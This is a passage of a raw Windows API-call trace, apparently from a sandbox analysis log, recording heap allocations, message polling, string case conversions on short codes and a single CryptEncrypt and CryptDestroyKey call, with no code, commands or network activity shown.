Flags=0x0, Size=0x10) returned 0x24aca50 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.851] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.851] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.851] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.851] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.851] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.852] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e6098*, pdwDataLen=0x8bef68*=0x7315, dwBufLen=0x7318 | out: pbData=0x24e6098*, pdwDataLen=0x8bef68*=0x7318) returned 1 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.852] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.854] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.855] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0196.855] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.855] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0196.855] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.855] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.855] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0196.855] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.856] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0196.856] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.856] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.856] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.856] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.856] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.856] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0196.857] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.857] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.857] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0196.857] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.857] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.857] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.864] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.864] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.864] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0196.864] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.864] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0196.864] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.865] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.865] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.865] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.865] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.865] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0196.865] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.866] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.867] PeekMessageW 